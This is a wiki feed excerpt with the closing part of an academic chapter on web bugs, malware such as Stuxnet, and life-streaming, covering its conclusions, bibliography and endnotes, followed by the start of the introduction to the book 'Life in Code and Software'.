&lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4697</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4697"/>
		<updated>2012-04-18T13:38:22Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
